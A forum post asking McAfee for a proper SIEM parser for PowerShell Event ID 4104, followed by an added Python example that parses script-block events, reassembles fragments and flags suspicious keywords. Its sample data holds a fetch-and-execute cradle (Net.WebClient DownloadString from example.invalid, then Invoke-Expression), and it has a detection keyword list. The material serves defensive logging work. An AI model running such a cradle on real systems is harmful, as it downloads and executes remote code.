5 Replies Latest reply on Sep 29, 2017 7:11 AM by anton2016

    PowerShell Event ID 4104 Parsing

    anton2016

      I am wondering if anyone had any luck ingesting this event. I'm running the latest SIEM version and PowerShell Event ID 4104 is not parsing correctly. I see the domain and username but not the command.

      It's been years since this command was introduced and given the frequency of PowerShell attacks, I'm really surprised that the SIEM cannot parse this event. Event ID 800 is parsing correctly; however, this is a legacy event that is not present in Windows 2016 systems. Event 4104 also contains more information.


      If someone from McAfee is reading this, can we please have a proper parser for this event?


      Thank you
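Added example, not part of anton2016's post and not McAfee parser code: a small Python parser showing what a 4104 (Script Block Logging) parser has to extract to make the command visible. The command lives in the ScriptBlockText data field, and a long script block is split across several 4104 events, so the MessageNumber/MessageTotal fields have to be used to stitch the fragments back together by ScriptBlockId before the full text can be searched. The field names and XML layout follow the real Microsoft-Windows-PowerShell/Operational 4104 schema; the sample events, host name, SID, ScriptBlockIds and script content are constructed for this example, and the keyword list in flag() is an illustrative assumption, not a detection rule.

```python
import xml.etree.ElementTree as ET
from collections import defaultdict

# Windows event XML namespace, as emitted by Get-WinEvent ... | % { $_.ToXml() }
NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}


def make_event(sbid, number, total, text, path=""):
    """Build a constructed 4104 event in the real schema layout (sample data only:
    host name, SID, ScriptBlockId and script text are invented for this example)."""
    return f"""<Event xmlns="{NS['e']}">
  <System>
    <Provider Name="Microsoft-Windows-PowerShell"/>
    <EventID>4104</EventID>
    <Computer>ws01.corp.example</Computer>
    <Security UserID="S-1-5-21-1111111111-2222222222-3333333333-1001"/>
  </System>
  <EventData>
    <Data Name="MessageNumber">{number}</Data>
    <Data Name="MessageTotal">{total}</Data>
    <Data Name="ScriptBlockText">{text}</Data>
    <Data Name="ScriptBlockId">{sbid}</Data>
    <Data Name="Path">{path}</Data>
  </EventData>
</Event>"""


SB_A = "c0ffee00-1111-2222-3333-444455556666"  # constructed
SB_B = "deadbeef-7777-8888-9999-aaaabbbbcccc"  # constructed
SB_C = "0badf00d-dddd-eeee-ffff-000011112222"  # constructed

SAMPLE_EVENTS = [
    # Block A is collected out of order: part 2 of 2 arrives before part 1.
    make_event(SB_A, 2, 2, "Invoke-Expression $p"),
    make_event(SB_B, 1, 1, "Get-Process | Where-Object { $_.CPU -gt 100 }",
               path="C:\\ops\\cpu.ps1"),
    make_event(SB_A, 1, 2, "$w = New-Object Net.WebClient; "
                           "$p = $w.DownloadString('http://example.invalid/p.ps1'); "),
    # Block C: only 1 of 3 fragments seen, so it must not be reported as complete.
    make_event(SB_C, 1, 3, "function Start-Stage {"),
]


def parse_4104(xml_text):
    """Extract the fields a SIEM parser needs from one 4104 event."""
    root = ET.fromstring(xml_text.strip())
    event_id = int(root.findtext("e:System/e:EventID", namespaces=NS))
    if event_id != 4104:
        raise ValueError(f"not a 4104 event: {event_id}")
    # EventData is a list of <Data Name="..."> elements; index them by Name.
    data = {d.get("Name"): (d.text or "")
            for d in root.findall("e:EventData/e:Data", NS)}
    sec = root.find("e:System/e:Security", NS)
    return {
        "computer": root.findtext("e:System/e:Computer", namespaces=NS),
        "user_sid": sec.get("UserID") if sec is not None else None,
        "script_block_id": data.get("ScriptBlockId"),
        "message_number": int(data.get("MessageNumber", "1")),
        "message_total": int(data.get("MessageTotal", "1")),
        "path": data.get("Path", ""),
        "script_block_text": data.get("ScriptBlockText", ""),
    }


def reassemble(records):
    """Stitch multi-part script blocks back together, in MessageNumber order,
    keyed by ScriptBlockId. Blocks with missing fragments are left out."""
    parts = defaultdict(dict)
    totals = {}
    for rec in records:
        parts[rec["script_block_id"]][rec["message_number"]] = rec["script_block_text"]
        totals[rec["script_block_id"]] = rec["message_total"]
    complete = {}
    for sbid, frags in parts.items():
        if len(frags) == totals[sbid]:
            complete[sbid] = "".join(frags[i] for i in range(1, totals[sbid] + 1))
    return complete


# Illustrative keyword list (assumption for the example, not a vetted detection rule).
SUSPICIOUS = ("FromBase64String", "DownloadString", "Invoke-Expression", "-EncodedCommand")


def flag(text):
    """Return the suspicious keywords present in a reassembled script block."""
    low = text.lower()
    return [kw for kw in SUSPICIOUS if kw.lower() in low]


def analyse(xml_events):
    """End to end: parse each 4104 event, reassemble blocks, flag keywords."""
    records = [parse_4104(x) for x in xml_events]
    return {sbid: {"text": text, "flags": flag(text)}
            for sbid, text in reassemble(records).items()}


if __name__ == "__main__":
    for sbid, r in analyse(SAMPLE_EVENTS).items():
        print(sbid, r["flags"], r["text"])
```

The point the example makes about a parser that only yields domain and user: the Security element gives the SID, but the command itself is only in ScriptBlockText, and matching on a single fragment (as block A shows, where the download and the Invoke-Expression land in different events) misses context that is only visible once the fragments are joined by ScriptBlockId.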